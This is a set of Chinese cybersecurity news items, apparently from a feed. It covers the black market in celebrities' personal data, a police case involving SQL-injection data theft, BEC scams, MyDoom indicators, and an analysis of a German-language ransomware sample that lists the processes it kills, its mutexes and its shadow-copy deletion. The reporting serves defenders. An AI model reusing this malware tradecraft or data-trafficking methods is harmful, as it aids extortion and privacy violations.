为了进一步核实出售明星信息的真实性,记者先后查询了王源、易烊千玺、王俊凯三位艺人的身份证信息。随后在机场值机平台输入后,果然查到了其中两位有行程安排的航班信息。

  

一位“黄牛”告诉记者,如果直接购买明星的航班信息每次只需要10元。

  

除了“黄牛”,在明星信息地下售卖链条中,还有一个名为“敲机子”的特殊群体。“如果你来不及去机场就可以找他们代为查询,然后发给你,每次只需要5块钱。”小颖说。


640.webp.jpg

▲“黄牛”向记者提供的明星信息。网络截图



━━━━━

明星手机号码30元一条

  

可售卖的明星艺人个人信息“十分丰富”,除了手机号、身份证号之外,明星游戏账号、户籍、入住的酒店也是售卖的热门信息。

  

记者联系到的另一位“黄牛”称,其所售卖的艺人手机号均绑定了支付宝或者微信,真实可靠,30元一条。黄牛随后提供了一名艺人的电话号码,随后通过支付宝验证属实。

  

同时,该“黄牛”还售卖有朱一龙、罗云熙、王鹤隶等近10位艺人的手机号码、QQ号等。

  

微信上一位“黄牛”向记者介绍,除了手机号码,他手里还有部分艺人的游戏账号和户籍信息。随后对方发来了易烊千玺的王者荣耀账号和肖战的绝地求生账号。

  

在一位卖家的标价中,吴亦凡的户籍信息只需要50元。

  

对方给记者发来的户籍照片显示,照片右上方为吴亦凡的素颜证件照,这张照片不仅包括吴亦凡的原名、身份证号、籍贯、家庭地址、文化程度,还包括他婚姻状况和兵役状况。

  

“酒店信息也是大家买得比较多的。”上个月,小颖和朋友通过“黄牛”顺利地购买到了艺人周震南在长沙下榻的某家酒店信息,并提前赶到蹲守,最终在周震南进出酒店期间“偶遇”成功。

  

“这些黄牛卖的信息基本上都是真的,因为一旦卖过一次假的,就没人再来找你买了。”小颖说。

  

这些私人信息是哪里来的?一位“黄牛”告诉记者,自己也是从上家那里拿到的,且招收代理,“代理费100元,拿货很便宜”。


━━━━━

律师说法

提供明星信息涉嫌侵犯公民个人信息罪

  

公民个人信息泄露的事件已屡见不鲜,有关部门也对此加以严厉打击。根据新京报此前相关报道,公民个人细信息泄露有的是相关数据管理人员“监守自盗”,有的则是一些网络黑客通过各种“黑客手段”盗取数据。有的黑客或将数据发布在网站上“炫技”,有的则出售贩卖。这些数据来源则是一些个人信息搜集单位,涉及教育、医疗等各个方面。

  

广东中安律师事务所合伙人、深圳国际仲裁院仲裁员潘翔表示,明星的个人信息往往来源于机票销售代理、酒店等公共服务单位或者此类单位的网络运营平台,粉丝经济也助推了贩卖明星信息的非法产业链。明星艺人的身份信息、电话号码、家庭地址、家庭成员情况、航班出行信息等均属于法律保护的公民个人信息。

  

潘翔介绍,向他人出售或者提供明星个人信息,情节严重的,涉嫌《刑法》规定的侵犯公民个人信息罪,判处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

640.webp.jpg 

而根据《最高人民法院、最高人民检察院关于办理侵犯公民个人信息刑事案件适用法律若干问题的解释》,非法获取、出售或者提供行踪轨迹信息、通信内容、征信信息、财产信息50条以上;非法获取、出售或者提供住宿信息、通信记录、健康生理信息、交易信息等其他可能影响人身、财产安全的公民个人信息500条以上;提供前述信息以外的公民个人信息5000条以上,或违法所得5000元以上等情况,均属于“情节严重”范畴。

以上信息整理于新京报,新京报记者 王飞翔 实习生 蒋欣玥  值班编辑 花木南 吾彦祖 

9999.jpg

]]>
湖南警方破获特大贩卖公民个人信息案 贩卖信息1000多万条 交易金额200余万元 Sun, 18 Aug 2019 13:46:49 +0800 7月11日,常德津市警方通报“净网2019”专项行动中,该局多警种联合作战、深度经营、积极扩线、主动出击,成功侦破湖南省公安厅挂牌督办的涉及湖北武汉、广东清远、深圳、上海等全国多地,路某等人特大侵犯公民个人信息案。警方扣押作案手机20部、电脑15台、银行卡50张。该案涉及公民信息1000多万条、非法交易金额200余万元。

640.webp.jpg

10日,该案路某、吴某、李某、胡某、茆某、李某华、陈某等7名犯罪嫌疑人经检察机关审查和批准,分别被移送起诉和依法逮捕。

640.webp.jpg

去年12月初,津市市公安局网安大队民警通过网络巡查发现,租住在津市的一名男子有侵犯公民个人信息的嫌疑。经缜密部署,网安民警联合快警大队对嫌疑人李某进行抓捕,并在其家中搜出一台电脑和一部手机。

640.webp.jpg

经审讯,现年25岁的犯罪嫌疑人李某,系澧县小渡口镇人。去年8月以来,他利用互联网、暗网,通过QQ群、微信、百度贴吧,向上线购买包含姓名与手机号码对应的个人信息,然后加价贩卖。同时,民警在其电脑硬盘、QQ邮箱内发现了大量公民个人信息。

640.webp.jpg

津市市公安局迅速成立了由津市市人民政府副市长、公安局局长戴志刚任组长的“净网2019”侵犯公民个人信息专案组,从网安、刑侦、治安大队等单位抽调精干民警合成作战。专案组民警迅速奔赴湖北、广东、上海等地,将卢某、李某华、陈某、茆某、胡某等缉拿归案。

640.webp.jpg

侦查中,民警发现澧县澧阳人吴某便是李某口中的上线。经过对嫌疑人吴某的缜密分析,民警迅速锁定其真实身份以及位置,于3月19日将其抓获。

经审讯,犯罪嫌疑人吴某交代,他通过网上聊天认识了远在深圳的“卢某”,向其购买公民个人信息后,加价转手卖给下线李某、胡某、茆某、卢某、陈某等人,从中非法获利50多万元。犯罪嫌疑人吴某、李某到案后,警方对吴某作案的苹果笔记本电脑进行鉴定,发现存有公民个人信息1737165条,在李某的QQ邮箱中发现公民个人信息49156条。

640.webp.jpg

据犯罪嫌疑人卢某交代,他手中的公民信息是从一个叫路某的黑客手中购买的。经过对嫌疑人路某分析,民警发现路某具备极高的网络攻防技术,利用SQL注入、解析漏洞等方式攻破某交易平台获取其中的公民个人信息。民警很快锁定路某真实身份为深圳某网络公司技术研发员。他破解多个网站密码后,非法进入后台,大肆盗窃公民个人信息

6月29日,经过4小时的摸排蹲守,民警成功在深圳市罗湖区一公寓内将路某抓获归案。经审讯,犯罪嫌疑人路某对自己贩卖公民个人信息的犯罪行为供认不讳。截至案发,路某非法获利60多万元。据津市市公安局网安大队大队长周志刚介绍,犯罪分子非法贩卖公民个人信息1000多万条,涉及20多个省市的公民。截止到7月10日,该案移送起诉3人,批准逮捕4人,案件还在进一步侦办中。来源央视新闻

9999.jpg

]]>
“鲸钓攻击”兴起,美英企业高管成为关键目标 Sun, 18 Aug 2019 13:46:49 +0800 虽然这是一个可怕的前景,但未来的商业电子邮件妥协 (BEC) 骗局可能就是这样!

所谓 “鲸钓攻击” (Whaling Attack) 指的就是针对高层管理人员的欺诈和商业电子邮件骗局。如今,商业电子邮件妥协 (BEC) 攻击已经对全球各类型组织都构成了严重的威胁,而令人更为担忧的现实是,这种攻击类型正变得越来越复杂,遭受 “鲸钓攻击” 的受害者往往需要承受比普通网络钓鱼攻击更沉重的经济损失。

在这里,我们要为大家补充一下 “鲸钓攻击” 与普通 “网络钓鱼攻击” 甚至 “鱼叉式网络钓鱼攻击” 的不同之处:

鲸钓攻击vs.网络钓鱼攻击

顾名思义 “鲸钓攻击” 胃口更大,与随机窃取电脑使用者个人机密资料的 “网络钓鱼” (phishing) 不同,鲸钓攻击比网络钓鱼更懂得放长线钓大鱼!这类针对性网络钓鱼手法专门锁定企业高级主管,试图利用电子邮件来骗取信息。网络媒体《Lifewire》指出,鲸钓攻击电子邮件皆假冒某权威来源的电子邮件地址,并且要求收件人尽速解决某项紧急问题。黑客利用这样的手法来骗取员工信息、重要文件,甚至是关键系统的帐号密码。

鲸钓攻击vs.鱼叉式网络钓鱼攻击

鲸钓攻击与鱼叉式网络钓鱼有相似之处,都是针对特定的人群来进行社会工程攻击,不过这两者还是有一些差别。

鲸钓攻击虽说也是针对性攻击 (targeted attack),但目标主要还是集中在 C 级企业高管、政界人士和名人(这些人就是所谓的 “鲸”),据国外相关机构的统计,大约 35% 的 CEO 和 CFO 受到过鲸钓攻击。

此外,从受众面来看,鲸钓似乎影响会更大(这一点其实从字面就可以理解,一个是钓鱼,一个是鲸,哪个造成的危害更大可谓一目了然),但实际上攻击者更愿意选择鱼叉式网络钓鱼,这背后的原因或许在于这种攻击类型的成功率更高。

根据总部位于加利福尼亚州的网络安全公司赛门铁克的说法,该公司已经注意到这种利用钓鱼邮件针对企业高管进行高级社会工程攻击的 “鲸钓攻击” 类型的复杂程度正在稳步上升。

赛门铁克警告称,访问强大的机器学习工具意味着一系列音频和视频操作技巧可能很快也会成为此类攻击的一部分,这些攻击通常是高度个性化的,旨在成功引起企业高管们的关注。

该公司还发现,这种攻击类型的财务影响也在稳步上升中。(赛门铁克还指出,今年早些时候联邦调查局发布的《互联网犯罪报告》发现,BEC 攻击在 2018 年共计造成了 13 亿美元的损失——这一数字远超于五年前的 6000 万美元。)

赛门铁克研究人员发现,在过去 12 个月中,企业每月平均会收到 5 封 BEC 诈骗电子邮件。这就意味着每家企业有 17% 的机会每月至少收到一封 BEC 电子邮件。而在此之前的 12 个月中,一个组织每月平均会收到4封BEC电子邮件,这意味着 BEC 攻击正在呈稳步上升的趋势。

调查显示,美国企业是 BEC 骗局的最大受害者,占据所有 BEC 攻击的 39%,紧随其后的是占比 26% 的英国。令人意外的是,欧盟国家德国、比利时和荷兰 3 个国家加在一起仅占 BEC 攻击总数的 7%。

商业电子邮件妥协 (BEC) 攻击

BEC 骗局的本质是部分攻击部分社会工程,为了提高社会工程手段的成功率,威胁行为者会不断尝试新的关键词,而这些关键词的作用主要就是吸引、刺激或激怒收件人,以增加其点击邮件的可能性。

赛门铁克发现,在针对英国和美国企业的BEC攻击案例中,“重要 (Important) ” 这个词是最常用的,有超过 32,000 个记录在案的使用实例。然而,纵观全球 BEC 骗局,总体上最常用的关键词却是 “交易请求 (Transaction Request) ”,这显示了黑客非常擅长利用人类对于财务问题的焦虑情绪。

多年来,随着威胁行为者可以获取到越来越便宜的工具,如视频编辑和机器学习程序或僵尸网络,这些骗局也在不断发展精进。而随着这些改变或制作视频和音频的技术变得越来越复杂和便宜,毫无疑问,黑客们也将越来越多地使用这些工具实施犯罪活动。

对此,赛门铁克公司警告称,如今,BEC 诈骗者可以使用机器学习 (ML) /人工智能 (AI) 技术针对一个组织的高级财务主管或员工,这些员工通常可以直接与 CEO 沟通并且可以授权转账。当员工试图验证请求时,诈骗者可能会使用 CEO 的音频资料,例如 Earnings call(指的是上市公司管理者、分析师、投资者和媒体之间的电话会议,讨论公司在特定报告期,如季度或年度财报期的财务业绩情况)、YouTube 视频、TED 演讲以及其他之前的录音资料等,来欺骗该员工让其相信对话另一端确实是 CEO 的声音,是 CEO 授权了交易请求。然后,员工就会确信无疑地去执行该交易请求。

最后,赛门铁克强调称,虽然这是一个非常可怕的前景,但未来的 BEC 诈骗场景可能就是这样。

联邦调查局发布的《互联网犯罪报告》:

https://pdf.ic3.gov/2018_IC3Report.pdf

9999.jpg

]]>
MyDoom蠕虫病毒势头不减 Sun, 18 Aug 2019 13:46:49 +0800 摘要

Mydoom是一款远近闻名的计算机蠕虫病毒,最早于2004年初被发现。这一蠕虫病毒被列为十大最具破坏性的计算机病毒,已造成了380亿美元的损失。虽然现在已经过了鼎盛时期,但该病毒对网络安全仍有很大威胁。虽然没有其他恶意软件家族显眼,但在过去的几年里,mydoom仍然活动频繁,约占所有带有恶意软件附件邮件的1.1%。我们每月记录近数万个mydoom样本。绝大多数mydoom电子邮件来自中国IP地址。这些电子邮件发送给世界各地的接收者,该病毒主要针对高科技、批发、零售、医疗、教育和制造业。

本文记录了该病毒最近几年的活动,并详细记录了2019年前六个月的趋势。

2015-2018年间活动

Mydoom的传播方法是通过使用电子邮件。分析过程中将包含mydoom附件的电子邮件与包含其他类型恶意软件附件的电子邮件进行了比较。从2015年到2018年的四年时间里,1.1%的恶意邮件包含了Mydoom。在同一时期查看单个恶意软件样本时,mydoom恶意电子邮件占有量平均值为21.4%。

为什么Mydoom电子邮件的百分比要比Mydoom附件的百分比低得多?因为许多恶意的电子邮件活动都会向成百上千的收件人传递相同的恶意软件样本。但是mydoom是多态的,对于我们发现的每一封电子邮件,往往都有不同的文件散列。因此,虽然mydoom电子邮件的数量相对较低,但与通过电子邮件传播的其他恶意软件相比,样本的数量相对较高。下表包含了2015年至2018年的统计数据。

11.PNG12.PNG13.PNG

Mydoom 2019年活动

2019年前6个月mydoom活动显示,其与2018年相比平均值相似,电子邮件和恶意软件样本的比例略高。详见表2。

14.PNG在一个月内出现了超过574个mydoom样本,下表3中记录了每月mydoom恶意软件样本数量变化。

15.PNG16.PNG

这些电子邮件来自哪里?2019年前六个月看到的前十个国家的IP地址是:

中国:349454封

美国:18590封

英国:10151封

越南:4426封

韩国:2575封

西班牙:2154封

俄罗斯:1007封

印度:657封

台湾:536封

哈萨克斯坦:388封

31.PNG

与来源国相比,目标国更为多样化,分布更为均匀。十大目标国家是:

中国:72713封

美国:56135封

台湾:5628封

德国:5503封

日本:5105封

新加坡:3097封

大韩民国:1892

罗马尼亚:1651封

澳大利亚:1295封

英国:1187封

32.PNG

在此期间,前十个针对领域是:

高科技:212641封

批发和零售:84996封

医疗保健:49782封

教育:37961封

制造:32429封

专业和法律服务:19401封

电信:4125封

财务:2259封

运输与物流:1595封

保险:796封

这些结果很大程度上偏向我们的客户群。然而,这一数据表明,中国和美国是大多数mydoom邮件的来源国,也是最被病毒针对的国家。

mydoom特征

多年来,mydoom具有相似的特征。mydoom的电子邮件通常伪装成未发送电子邮件的形式,主题行如下:


寄送邮件失败

电子邮件的邮寄报告

邮件系统错误–返回邮件

无法传递邮件

返回邮件:数据格式错误

退回邮件:详见传输单

但是,我们也经常看到主题行中有随机字母字符的mydoom电子邮件。mydoom电子邮件还使用其他主题行,如:Click me baby, one more timehelloHisay helo to my litl friend

图8、9和10显示了2019年7月mydoom电子邮件样本的截图。 

41.PNG42.PNG43.PNG

这些mydoom电子邮件的附件是可执行文件,或者是包含可执行文件的zip压缩包。MyDoom恶意软件会将受感染的Windows主机变成恶意垃圾邮件发送人,然后将MyDoom电子邮件发送到其他目标电子邮件地址。即使受感染的Windows主机没有邮件客户端,该病毒也会利用受感染主机发送邮件。MyDoom的另一个特点是试图通过TCP端口1042连接到其他IP地址。

51.PNG52.PNG

在Windows7主机上,mydoom在用户的appdata\local\temp目录中将自己复制为lsass.exe,但该恶意软件在Windows注册表中不会一直存在。在Windows XP主机上,mydoom可执行文件在c:\windows\lsass.exe处生成自身副本,并通过hkey_local_machine hive中的Windows注册表持久存在,并在software\microsoft\windows\currentversion\run中使用名为traybar的项,如图13所示。

53.PNG

总结

第一次发现mydoom是在2004年,mydoom今天仍然活跃。这些年来尽管基于恶意软件的电子邮件中有存在mydoom的比例并不高,仍然有许多基础设施受到感染。

根据数据统计,mydoom感染的基础设施主要位于中国的IP地址,而美国则处于第二位。中国和美国都是mydoom电子邮件的主要针对国家。高科技是该病毒最针对的行业。

IOCs

2019年7月Mydoom Exe样本1b46afe1779e897e6b9f3714e9276ccb7a4cef6865eb6a4172f0dd1ce1a46b42

48cf912217c1b5ef59063c7bdb93b54b9a91bb6920b63a461f8ac7fcff43e205

50dfd9af6953fd1eba41ee694fe26782ad4c2d2294030af2d48efcbcbfe09e11

6a9c46d96f001a1a3cc47d166d6c0aabc26a5cf25610cef51d2b834526c6b596

9e4c6410ab9eda9a3d3cbf23c58215f3bc8d3e66ad55e40b4e30eb785e191bf8

9999.jpg

]]>
破坏型攻击爆发:制造业沦为重灾区 Sun, 18 Aug 2019 13:46:49 +0800 研究人员表示在过去6个月中网络攻击所造成的破坏力翻倍,而且受影响的组织中有50%属于制造业。基于近阶段的网络攻击,本周一IBM的X-Force IRIS事件响应团队发布了新的安全研究报告,强调破坏型恶意软件正在快速爆发。通过对恶意代码的分析发现,诸如Industroyer,NotPetya或Stuxnet在内的恶意程序不再是纯碎的窃取数据和秘密监控,而是造成更有破坏力的伤害。这些破坏行为包括锁定系统、让PC崩溃、渲染服务不可操作以及删除文件等等。

jxyob78g.jpg

研究人员表示:“在历史上,像Stuxnet,Shamoon和Dark Seoul这样的破坏性恶意软件通常是被有国家背景的黑客所使用。不过自2018年年末以来,网络攻击份子开始不断将这些破坏型代码整合到自己的攻击中,例如LockerGoga和MegaCortex这样的新型勒索软件。”

而制造业是这些攻击的主要目标,目前曝光的案件中50%以上和工业公司有关。其中石油、天然气和教育领域的组织是重灾区,非常容易受到这种类型的攻击。最常见的初步感染手段就是网络钓鱼电子邮件,然后窃取进入内部网络所需要的电子凭证,注水漏洞攻击,劫持目标连接从而让对方妥协。

在发动恶意攻击之前,一些黑客将潜伏在公司系统中数月。IBM的X-Force IRIS事件响应团队的全球补救负责人Christopher Scott表示:“目前在破坏型恶意软件中存在另种攻击行为,前期保持缓慢发展,直到收集到需要的所有信息才会进行破坏;而另一种则是单纯的入侵然后破坏。”

报告中称当一家企业遭受破坏型恶意软件攻击之后,平均会有12000个工作站受到损坏,并且在攻击事件发生之后可能需要512个小时或者更长时间才能恢复。在一些极端情况下,恢复时间甚至可以延长到1200个小时。而大公司的恢复成本非常高,平均成本高达2.39亿美元。作为对比,Ponemon Institute估计,平均数据泄露将花费392万美元。

9999.jpg



]]>
速递|工信部网络安全管理局:《网络安全漏洞管理规定》近期将印发 Sun, 18 Aug 2019 13:46:49 +0800

640.webp.jpg

2019年7月30日,在北京举行的第五届互联网安全领袖峰会(CSS 2019)上,工信部网络安全管理局副局长杨宇燕在演讲中指出,互联网与实体经济融合的广度和深度不断拓展,与此同时网络安全风险和威胁也随之扩展和叠加,加速向物联网、工业互联网等新领域蔓延,网络安全形势日益复杂严峻。

对此,杨宇燕称,工信部主要围绕“三个体系”推进网络安全工作。
第一是网络基础设施防护体系。
统筹推进相关的法律、制度、标准、手段的建设,发布《电信和互联网行业网络安全工作的指导意见》等一系列的文件。
杨宇燕透露,最近《网络安全漏洞管理规定》《关于加强工业互联网安全工作的指导意见》已经向社会进行公开征求意见,将会于近期印发,以责任考核、行政监察、专项行动为抓手,构建事前防范、事中监测、事后应急“三位一体”的网络安全设施防护体系。
2019年6月18日,工信部公布《网络安全漏洞管理规定(征求意见稿)》,面向社会公开征求意见,4月份,《关于加强工业互联网安全工作的指导意见(征求意见稿)》发布。
第二是网络威胁综合治理的体系。
强化网络安全监测预警、信息共享、应急处置等手段的建设,和中央网信办、公安部等联合开展勒索病毒、恶意地址、链接等网络威胁专项治理,防范打击电信网络诈骗,为数字经济健康发展营造良好的网络环境。
第三是网络安全产业的生态体系。
聚焦政策引领、技术促进、企业扶持、生态缔造、推进产业发展指导性文件的起草。
谈及做好网络安全工作,杨宇燕提出,要发挥同业作用,带动落实网络安全责任;夯实基础能力,积极做好网络安全保障支撑;强化技术创新,不断提升网络安全核心竞争能力;深化开放合作,共建网络安全产业生态。具体包括:加强网络安全的共享通报和协同处置,欢迎积极参与工信部网络安全威胁信息共享平台的建设,加强安全能力的转化输出,为金融、能源等重点的行业领域提供安全服务,紧密围绕5G、IPv6、工业互联网、物联网等需求,加大研发投入力度,推动网络安全核心技术创新突破。

网络安全漏洞管理规定(征求意见稿)

第一条 为规范网络安全漏洞(以下简称漏洞)报告和信息发布等行为,保证网络产品、服务、系统的漏洞得到及时修补,提高网络安全防护水平,根据《国家安全法》《网络安全法》,制定本规定。

第二条 中华人民共和国境内网络产品、服务提供者和网络运营者,以及开展漏洞检测、评估、收集、发布及相关竞赛等活动的组织(以下简称第三方组织)或个人,应当遵守本规定。

第三条 网络产品、服务提供者和网络运营者发现或获知其网络产品、服务、系统存在漏洞后,应当遵守以下规定:

(一)立即对漏洞进行验证,对相关网络产品应当在90日内采取漏洞修补或防范措施,对相关网络服务或系统应当在10日内采取漏洞修补或防范措施;

(二)需要用户或相关技术合作方采取漏洞修补或防范措施的,应当在对相关网络产品、服务、系统采取漏洞修补或防范措施后5日内,将漏洞风险及用户或相关技术合作方需采取的修补或防范措施向社会发布或通过客服等方式告知所有可能受影响的用户和相关技术合作方,提供必要的技术支持,并向工业和信息化部网络安全威胁信息共享平台报送相关漏洞情况。

第四条 工业和信息化部、公安部和有关行业主管部门按照各自职责组织督促网络产品、服务提供者和网络运营者采取漏洞修补或防范措施。

第五条 工业和信息化部、公安部、国家互联网信息办公室等有关部门实现漏洞信息实时共享。

第六条 第三方组织或个人通过网站、媒体、会议等方式向社会发布漏洞信息,应当遵循必要、真实、客观、有利于防范和应对网络安全风险的原则,并遵守以下规定:

(一)不得在网络产品、服务提供者和网络运营者向社会或用户发布漏洞修补或防范措施之前发布相关漏洞信息;

(二)不得刻意夸大漏洞的危害和风险;

(三)不得发布和提供专门用于利用网络产品、服务、系统漏洞从事危害网络安全活动的方法、程序和工具;

(四)应当同步发布漏洞修补或防范措施。

第七条 第三方组织应当加强内部管理,履行下列管理义务,防范漏洞信息泄露和内部人员违规发布漏洞信息:

(一)明确漏洞管理部门和责任人;

(二)建立漏洞信息发布内部审核机制;

(三)采取防范漏洞信息泄露的必要措施;

(四)定期对内部人员进行保密教育;

(五)制定内部问责制度。

第八条 网络产品、服务提供者和网络运营者未按本规定采取漏洞修补或防范措施并向社会或用户发布的,由工业和信息化部、公安部等有关部门按职责依据《网络安全法》第五十六条、第五十九条、第六十条等规定组织对其进行约谈或给予行政处罚。

第九条 第三方组织违反本规定向社会发布漏洞信息,由工业和信息化部、公安部等有关部门组织对其进行约谈,或依据《网络安全法》第六十二条、第六十三条等规定给予行政处罚;构成犯罪的,依法追究刑事责任;给网络产品、服务提供者和网络运营者造成经济或名誉损害的,依法承担民事责任。

第十条 鼓励第三方组织和个人获知网络产品、服务、系统存在的漏洞后,及时向国家信息安全漏洞共享平台、国家信息安全漏洞库等漏洞收集平台报送有关情况。漏洞收集平台应当遵守本规定第六条、第七条规定。

第十一条 任何组织或个人发现涉嫌违反本规定的情形,有权向工业和信息化部、公安部举报。

第十二条 本规定自印发之日起施行。

9999.jpg

]]>
警惕新型勒索病毒来袭,勒索提示信息使用德语! Sun, 18 Aug 2019 13:46:49 +0800 近日国外某独立安全研究员(专门从事恶意样本分析工作),发现了一款新型的勒索病毒,这款勒索病毒使用了高强度代码混淆手段,会修改桌面背景,这种手法与之前的GandCrab和Sodinokibi两款勒索病毒非常类似,这款勒索病毒的勒索提示信息使用了德语,这种使用德语提示信息的勒索病毒在之前发现的勒索病毒家族中是比较少见的,之前报告我就说过,GandCrab勒索病毒的故事虽然结束了,但后面会有越来越多的像GandCrab的黑产团伙出现,因为只要有利益的地方,就会有黑产。

GandCrab让做黑产的看到了巨大的利益,未来新型勒索病毒还会增加,虽然总体数量可能会减少,但针对企业的勒索攻击会越来越多,流行的勒索病毒家族会增多,使用技术手段也会不断变化,这些针对企业的勒索病毒背后都会有一个像GandCrab黑产运营团队那样的团队,他们分工协作,在背后操控运营着这些流行的勒索病毒,专门针对特定企业进行勒索攻击,然后从中获取巨大的利润,这款勒索病毒未来可能会爆发,请各安全厂商密切关注此勒索病毒的活跃情况,即时预警,国外独立恶意软件安全研究人员曝光此勒索病毒的信息,如下所示:



勒索病毒样本已经被人上传到了在app.any.run网站,这个在线的分析网站做的不错,很适合一些新手,在我的知识星球写了一篇对这个网站的详细介绍,加入去知识星球学习,到目前为止这个网站已经收集了很多最新的病毒样本,估计都是国内外一些客户发现病毒样本之后,然后上传到这个网站的,这种在线沙箱网站是一种很好的收集最新病毒样本的方式,如下所示:





此勒索病毒运行之后,加密后的文件后缀为随机名,如下所示:





会修改桌面的背景,如下所示:





同时会在桌面生成一个勒索提示文件,文件名:[加密后缀]_Entschluesselungs_Anleitung.html,内容为德语,如下所示:







交付赎金的BTC地址:19D4iUqYYd1y3Hn295yfsacXUykWwqZaov,需要支付0.15个左右BTC



勒索病毒核心技术剖析



1.此勒索病毒母体使用了高强度的混淆代码,以逃避杀毒软件的检测,外壳采用VC编写,如下所示:





该样本的时间戳为2019年8月1日,如下所示:





2.获取函数地址,并分配相应的内存空间,如下所示:





3.在内存中解密出代码,然后跳转执行,如下所示:





4.解密执行内层的Payload代码,如下所示:





5.从内存中DUMP出Payload核心,是一个Delphi语言编写的勒索病毒,如下所示:





6.创建一个互斥变量HSDFSD-HFSD-3241-91E7-ASDGSDGHH,如下所示:





7.遍历进程,结束相关进程,如下所示:





结束相关进程



notepad.exe,dbeng50.exe,sqbcoreservice.exe,encsvc.exe,mydesktiopservice.exe,isqlplussvc.exe,agntsvc.exe,sql.exe,sqld.exe,mysql.exe,mysqld.exe,oracle.exe



如下所示:





8.创建互斥变量cFgxTERNWEVhM2V,获取主机磁盘目录,如下所示:





9.遍历磁盘目录文件,然后加密,此勒索病毒加密后的文件全填充为零,如下所示:





10.生成勒索信息文件[加密后缀]+ _Entschluesselungs_Anleitung.html,如下所示:





11.生成桌面背景,修改桌面背景,如下所示:





12.调用cmd命令删除磁盘卷影等操作,如下所示:





最近几年勒索病毒爆发,尤其是针对企业的勒索病毒攻击越来越多,关于勒索病毒的防护,给大家分享几个简单的方法,通过这些方法可以有效的防御部分勒索病毒:



1、及时给电脑打补丁,修复漏洞


2、谨慎打开来历不明的邮件,点击其中链接或下载附件,防止网络挂马和邮件附件攻击


3、尽量不要点击office宏运行提示,避免来自office组件的病毒感染


4、需要的软件从正规(官网)途径下载,不要用双击方式打开.js、.vbs、.bat等后缀名的脚本文件


5、升级防病毒软件到最新的防病毒库,阻止已知病毒样本的攻击


6、开启Windows Update自动更新设置,定期对系统进行升级


7、养成良好的备份习惯,对重要的数据文件定期进行非本地备份,及时使用网盘或移动硬盘备份个人重要文件


8、更改账户密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃,黑客会通过相同的弱密码攻击其它主机


9、如果业务上无需使用RDP的,建议关闭RDP,以防被黑客RDP爆破攻击

9999.jpg

]]>
勒索软件 GermanWiper 破坏数据然后索要赎金 Sun, 18 Aug 2019 13:46:49 +0800 iStock-817486228-1.jpg

一种新的勒索软件正在德国扩散。被称为 GermanWiper 的勒索软件通过电子邮件传播,感染之后它不是加密文件而是用随机字符覆写文件永久性的破坏用户数据。但在破坏数据之后它还会索要赎金。但支付赎金并不能恢复数据,除非用户有离线备份,否则遭到破坏的数据不可能恢复。好消息是这种破坏性的勒索软件只在德语国家传播,主要是德国。9999.jpg

]]>
15年前的电脑病毒MyDoom:现在仍极具破坏力 Sun, 18 Aug 2019 13:46:49 +0800 我们说,通常情况下,大部分的恶意软件都只是“红极一时”,然而就有那么一个特例,纵使已经拥有15岁的“高龄”却仍旧极具破坏力?且至今已造成超过380亿美元的损失?那么,究竟是怎样一款病毒呢?

Software-Virus-Communication-Matrix-Computer-Pc-2326147.jpg

资料图

近期,有关专家表示,一个15年前出现的恶意软件现在仍处于活跃状态(仿佛就像一座活火山,随时可能喷发),并且迄今为止其已造成超过380亿美元的损失,他们称这个高龄的病毒为MyDoom,被认为是有史以来传播速度最快,破坏性最强的计算机病毒之一。

首次发现MyDoom还要追溯到2004年。当年的7月份,MyDoom攻击了谷歌,致使后者的用户当天几乎无法进行网络搜索,不仅如此,包括当时流行的雅虎、Lycos和AltaVista等其他搜索引擎在内,也受到了严重影响。

也就是从那天开始,MyDoom便一直处于活跃状态。根据网络安全公司PaloAlto Networks的分析显示,在今年已发送的所有包含恶意软件的E-mail中,仍有相当数量的邮件带有MyDoom,足以证明其持久力。其实在某种程度上,MyDoom产生了全球1/4的电子邮件。

一般情况下,MyDoom会将自己伪装成邮件发送失败通知,并建议用户打开恶意软件藏身的附件来查找“失败”原因。若用户不幸被病毒感染,它会从受感染的计算机中抓取用户联系人的电子邮件地址,之后将其复制体隐藏在一个邮件中发送到这些地址,静待下一次复制与传播。

这意味着,只要还有一个人打开带有MyDoom的邮件,它的传播就不会停止!为了防止设备感染此类病毒,安全专家建议用户去了解一些基本的网络安全知识,并谨慎点击邮件中的附件。

9999.jpg



]]>
错误的 JIRA 配置导致数百家财富500强公司的数据泄露 Sun, 18 Aug 2019 13:46:49 +0800 来自国外的开发者 Avinash Jain 在8月2日时发表了一篇文章,揭露全球范围内使用非常广泛的问题跟踪软件 JIRA 由于错误的配置导致成千上万的公司泄露了内部的员工以及项目数据的问题。Jain 同时提供了如何去找出这些存在漏洞的 JIRA 系统的方法。

以下是 Jain 文章的内容:

几个月前,我发表了一篇关于“JIRA 泄露 NASA 员工和项目数据”的文章,我能够在这些泄露的数据中找到NASA员工的详细信息,包括用户名、电子邮件、ID 以及他们的内部项目详细信息。他们用的就是 Atlassian 的 JIRA 工具 - 一个独立任务跟踪系统/项目管理软件,全球约有135,000家公司和组织在使用。 而这次数据泄漏的根本原因是 JIRA 中存在的疯狂错误配置。 为什么使用“狂野”一词,是因为如果你的公司也在使用相同的错误配置,那么我也可以访问你们内部的用户数据和内部项目详细信息。

受影响的客户包括 NASA,谷歌,雅虎,Go-Jek,HipChat,Zendesk,Sapient,Dubsmash,西联汇款,联想,1password,Informatica等公司,以及世界各地政府的许多部门也遭受同样的影响,如欧洲政府,联合国,美国航天局,巴西政府运输门户网站,加拿大政府财政门户网站之一等。

接下来我将分享我在Jira(Atlassian任务跟踪系统/项目管理软件)中发现的那个关键漏洞,或者更具体地说是导致组织和公司内部敏感信息泄露的错误配置问题。

让我们看看究竟是什么问题!

在 JIRA 中创建过滤器或仪表板时,它提供了一些可见性选项。问题是由于分配给它们的权限错误。当在JIRA中创建项目/问题的过滤器和仪表板时,默认情况下,可见性分别设置为“所有用户”和“所有人”,而不是与组织中的每个人共享,所以这些信息被完全公开了。JIRA 中还有一个用户选择器功能,它提供了每个用户的用户名和电子邮件地址的完整列表。此信息泄露是 JIRA 全局权限设置中授权配置错误的结果。由于权限方案错误,以下内部信息容易受到攻击:

所有账号的雇员姓名和邮箱地址

雇员的角色

项目信息、里程碑等

任何拥有该系统链接的人都可以从任何地方访问它们并获取各种敏感信息,由于这些链接可能被所有搜索引擎编入索引,因此任何人都可以通过一些简单的搜索查询轻松找到它们。

来看看一些泄露的数据:

1. NASA员工数据

2. JIRA 过滤器公开访问